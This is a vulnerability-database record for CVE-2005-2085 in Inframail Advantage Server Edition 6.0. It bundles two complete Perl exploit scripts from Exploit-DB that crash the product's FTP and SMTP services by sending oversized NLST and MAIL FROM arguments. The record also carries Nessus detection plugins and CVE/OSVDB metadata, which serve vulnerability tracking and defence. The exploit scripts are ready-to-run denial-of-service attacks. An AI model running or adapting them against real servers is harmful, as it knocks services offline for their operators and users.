{"id": "EDB-ID:1166", "hash": "c467e5c578338673ea7ed1c6da2a6e5b", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Inframail Advantage Server Edition 6.0 <= 6.37 - FTP BoF Exploit", "description": "Inframail Advantage Server Edition 6.0. CVE-2005-2085. Dos exploit for windows platform", "published": "2005-06-27T00:00:00", "modified": "2005-06-27T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/1166/", "reporter": "Reed Arvin", "references": [], "cvelist": ["CVE-2005-2085"], "lastseen": "2016-01-31T13:40:48", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2016-01-31T13:40:48"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-2085"]}, {"type": "osvdb", "idList": ["OSVDB:17608", "OSVDB:17607"]}, {"type": "nessus", "idList": ["INFRAMAIL_AS_SMTP_OVERFLOW.NASL", "INFRAMAIL_AS_FTP_OVERFLOW.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:1165"]}], "modified": "2016-01-31T13:40:48"}, "vulnersScore": 6.7}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/1166/", "sourceData": "#===== Start Inframail_FTPOverflow.pl =====\r\n#\r\n# Usage: Inframail_FTPOverflow.pl <ip>\r\n# Inframail_FTPOverflow.pl 127.0.0.1\r\n#\r\n# Infradig Systems Inframail Advantage Server Edition 6.0\r\n# (Version: 6.37)\r\n#\r\n# Download:\r\n# http://www.infradig.com/\r\n#\r\n#########################################################\r\n\r\nuse IO::Socket;\r\nuse strict;\r\n\r\nmy($socket) = \"\";\r\n\r\nif ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],\r\n PeerPort => \"21\",\r\n Proto => \"TCP\"))\r\n{\r\n print \"Attempting to kill Inframail FTP server at $ARGV[0]:21...\";\r\n\r\n sleep(1);\r\n\r\n print $socket \"USER hello\\r\\n\";\r\n\r\n sleep(1);\r\n\r\n print $socket \"PASS moto\\r\\n\";\r\n\r\n sleep(1);\r\n\r\n print $socket \"NLST \" . \"A\" x 102400 . \"\\r\\n\";\r\n\r\n sleep(1);\r\n\r\n print $socket \"NLST \" . \"A\" x 102400 . \"\\r\\n\";\r\n\r\n close($socket);\r\n}\r\nelse\r\n{\r\n print \"Cannot connect to $ARGV[0]:21\\n\";\r\n}\r\n#===== End Inframail_FTPOverflow.pl =====\r\n\r\n# milw0rm.com [2005-06-27]\r\n", "osvdbidlist": ["17608"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:08:14", "bulletinFamily": "NVD", "description": "Buffer overflow in Inframail Advantage Server Edition 6.0 through 6.7 allows remote attackers to cause a denial of service (process crash) via a long (1) SMTP FROM field or possibly (2) FTP NLST command.", "modified": "2016-10-18T03:24:00", "id": "CVE-2005-2085", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2085", "published": "2005-07-05T04:00:00", "title": "CVE-2005-2085", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2019-02-21T01:08:36", "bulletinFamily": "scanner", "description": "The remote host is running the SMTP server component of Inframail, a commercial suite of network servers from Infradig Systems. \n\nAccording to its banner, the installed version of Inframail suffers from a buffer overflow vulnerability that arises when the SMTP server component processes a MAIL FROM command with an excessively long argument (around 40960 bytes). Successful exploitation will cause the service to crash and may allow arbitrary code execution.", "modified": "2018-11-15T00:00:00", "id": "INFRAMAIL_AS_SMTP_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=18588", "published": "2005-06-29T00:00:00", "title": "Inframail SMTP MAIL FROM Command Remote Overflow DoS", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(18588);\n script_version(\"1.14\");\n\n script_cve_id(\"CVE-2005-2085\");\n script_bugtraq_id(14077);\n\n script_name(english:\"Inframail SMTP MAIL FROM Command Remote Overflow DoS\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SMTP server is vulnerable to a buffer overflow attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running the SMTP server component of Inframail, a\ncommercial suite of network servers from Infradig Systems. \n\nAccording to its banner, the installed version of Inframail suffers\nfrom a buffer overflow vulnerability that arises when the SMTP server\ncomponent processes a MAIL FROM command with an excessively long\nargument (around 40960 bytes). Successful exploitation will cause the\nservice to crash and may allow arbitrary code execution.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://reedarvin.thearvins.com/20050627-01.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2005/Jun/347\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Inframail 7.12 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/06/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/06/27\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n script_summary(english:\"Checks for remote buffer overflow vulnerability in Inframail SMTP Server\");\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SMTP problems\");\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"smtpserver_detect.nasl\");\n script_require_ports(\"Services/smtp\", 25);\n exit(0);\n}\n\n\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\n\nport = get_service(svc:\"smtp\", default: 25, exit_on_fail: 1);\nif (get_kb_item('SMTP/'+port+'/broken')) exit(0);\n\n\nbanner = get_smtp_banner(port:port);\nif (banner && banner =~ \"InfradigServers-MAIL \\(([0-5]\\..*|6.([0-2].*|3[0-7])) \")\n security_hole(port);\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:08:36", "bulletinFamily": "scanner", "description": "The remote host is running the FTP server component of Inframail, a commercial suite of network servers from Infradig Systems. \n\nAccording to its banner, the installed version of Inframail suffers from a buffer overflow vulnerability that arises when the FTP server component processes an NLST command with an excessively long argument (around 102400 bytes). Successful exploitation will cause the service to crash and may allow arbitrary code execution.", "modified": "2018-11-15T00:00:00", "id": "INFRAMAIL_AS_FTP_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=18587", "published": "2005-06-29T00:00:00", "title": "Inframail FTP Server NLST Command Remote Overflow", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(18587);\n script_version(\"1.16\");\n\n script_cve_id(\"CVE-2005-2085\");\n script_bugtraq_id(14077);\n \n script_name(english:\"Inframail FTP Server NLST Command Remote Overflow\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FTP server is vulnerable to a buffer overflow attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running the FTP server component of Inframail, a\ncommercial suite of network servers from Infradig Systems. \n\nAccording to its banner, the installed version of Inframail suffers\nfrom a buffer overflow vulnerability that arises when the FTP server\ncomponent processes an NLST command with an excessively long argument\n(around 102400 bytes). Successful exploitation will cause the service\nto crash and may allow arbitrary code execution.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://reedarvin.thearvins.com/20050627-01.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2005/Jun/347\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Inframail 7.12 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/06/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/06/27\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n script_summary(english:\"Checks for remote buffer overflow vulnerability in Inframail FTP Server\");\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FTP\");\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\", \"ftp_overflow.nasl\");\n script_exclude_keys(\"ftp/msftpd\", \"ftp/ncftpd\", \"ftp/fw1ftpd\", \"ftp/vxftpd\");\n script_require_ports(\"Services/ftp\", 21);\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"ftp_func.inc\");\n\n\nport = get_ftp_port(default: 21);\n\n# Do a banner check for the vulnerability.\nbanner = get_ftp_banner(port:port);\nif (! banner) exit(1, \"No FTP banner on port \"+port+\".\");\nif (\n egrep(string:banner, pattern:\"InfradigServers-FTP \\(([0-5]\\..*|6.([0-2].*|3[0-7]))\\)\")\n) {\n security_hole(port);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:13", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.infradig.com/\n[Secunia Advisory ID:15828](https://secuniaresearch.flexerasoftware.com/advisories/15828/)\n[Related OSVDB ID: 17608](https://vulners.com/osvdb/OSVDB:17608)\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-06/0348.html\n[CVE-2005-2085](https://vulners.com/cve/CVE-2005-2085)\n", "modified": "2005-06-27T04:10:07", "published": "2005-06-27T04:10:07", "href": "https://vulners.com/osvdb/OSVDB:17607", "id": "OSVDB:17607", "title": "Inframail SMTP MAIL FROM Command Remote Overflow DoS", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:13", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.infradig.com/\n[Secunia Advisory ID:15828](https://secuniaresearch.flexerasoftware.com/advisories/15828/)\n[Related OSVDB ID: 17607](https://vulners.com/osvdb/OSVDB:17607)\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-06/0348.html\n[CVE-2005-2085](https://vulners.com/cve/CVE-2005-2085)\n", "modified": "2005-06-27T04:10:07", "published": "2005-06-27T04:10:07", "href": "https://vulners.com/osvdb/OSVDB:17608", "id": "OSVDB:17608", "title": "Inframail FTP NLST Command Remote Overflow DoS", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T13:40:39", "bulletinFamily": "exploit", "description": "Inframail Advantage Server Edition 6.0. CVE-2005-2085. Dos exploit for windows platform", "modified": "2005-06-27T00:00:00", "published": "2005-06-27T00:00:00", "id": "EDB-ID:1165", "href": "https://www.exploit-db.com/exploits/1165/", "type": "exploitdb", "title": "Inframail Advantage Server Edition 6.0 <= 6.37 - SMTP BoF Exploit", "sourceData": "#===== Start Inframail_SMTPOverflow.pl =====\r\n#\r\n# Usage: Inframail_SMTPOverflow.pl <ip>\r\n# Inframail_SMTPOverflow.pl 127.0.0.1\r\n#\r\n# Infradig Systems Inframail Advantage Server Edition 6.0\r\n# (Version: 6.37)\r\n#\r\n# Download:\r\n# http://www.infradig.com/\r\n#\r\n#########################################################\r\n\r\nuse IO::Socket;\r\nuse strict;\r\n\r\nmy($socket) = \"\";\r\n\r\nif ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],\r\n PeerPort => \"25\",\r\n Proto => \"TCP\"))\r\n{\r\n print \"Attempting to kill Inframail SMTP server at $ARGV[0]:25...\";\r\n\r\n sleep(1);\r\n\r\n print $socket \"HELO moto.com\\r\\n\";\r\n\r\n sleep(1);\r\n\r\n print $socket \"MAIL FROM:\" . \"A\" x 40960 . \"\\r\\n\";\r\n\r\n close($socket);\r\n}\r\nelse\r\n{\r\n print \"Cannot connect to $ARGV[0]:25\\n\";\r\n}\r\n#===== End Inframail_SMTPOverflow.pl =====\r\n\r\n# milw0rm.com [2005-06-27]\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1165/"}]}